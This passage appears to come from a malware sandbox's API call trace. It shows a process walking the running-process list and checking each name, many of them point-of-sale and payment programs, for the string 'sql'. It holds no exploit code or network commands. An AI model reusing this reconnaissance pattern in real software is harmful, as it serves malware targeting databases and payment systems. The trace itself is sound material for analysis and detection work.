dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3583500, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0141.677] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0141.677] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0141.677] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0141.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0141.678] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596988 [0141.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3596988, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0141.678] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0141.679] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0141.679] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0141.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0141.680] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596e68 [0141.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3596e68, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0141.680] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0141.680] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0141.680] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0141.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.681] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35837e8 [0141.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35837e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0141.682] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0141.682] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0141.682] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0141.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.683] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583758 [0141.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3583758, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0141.683] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0141.683] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0141.683] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0141.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.684] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35838a8 [0141.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x35838a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0141.684] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0141.684] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0141.684] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0141.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0141.685] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35839c8 [0141.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35839c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0141.685] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0141.685] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0141.685] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0141.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0141.687] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3596ce8 [0141.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3596ce8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0141.687] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0141.687] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0141.687] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0141.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0141.688] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596e08 [0141.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596e08, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0141.688] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0141.688] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0141.688] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0141.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.689] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583ae8 [0141.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3583ae8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0141.690] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0141.690] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0141.690] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0141.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.691] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583a88 [0141.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3583a88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0141.691] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0141.691] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0141.691] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0141.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.692] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583920 [0141.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3583920, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0141.693] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0141.693] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0141.693] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0141.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0141.694] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596ae8 [0141.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3596ae8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0141.694] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0141.694] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0141.694] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0141.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.695] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583998 [0141.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3583998, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0141.695] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0141.695] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0141.695] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0141.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.696] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583ad0 [0141.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3583ad0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0141.696] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0141.696] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0141.696] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0141.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0141.697] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3596c68 [0141.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596c68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0141.697] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0141.697] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0141.697] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0141.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.698] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583938 [0141.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3583938, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0141.698] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0141.698] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0141.699] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0141.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.700] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583a40 [0141.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3583a40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0141.700] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0141.700] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0141.700] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0141.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.701] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583980 [0141.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3583980, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0141.701] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0141.701] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0141.701] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0141.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.702] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583a58 [0141.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3583a58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0141.702] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0141.702] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0141.702] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0141.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.703] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35839e0 [0141.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x35839e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0141.703] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0141.703] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0141.703] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.705] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583b00 [0141.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3583b00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0141.705] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0141.705] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0141.705] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.706] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583bd8 [0141.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0141.706] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0141.706] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0141.706] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0141.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.708] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583b18 [0141.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583b18, cbMultiByte=12, lpDefaultChar=0x0, 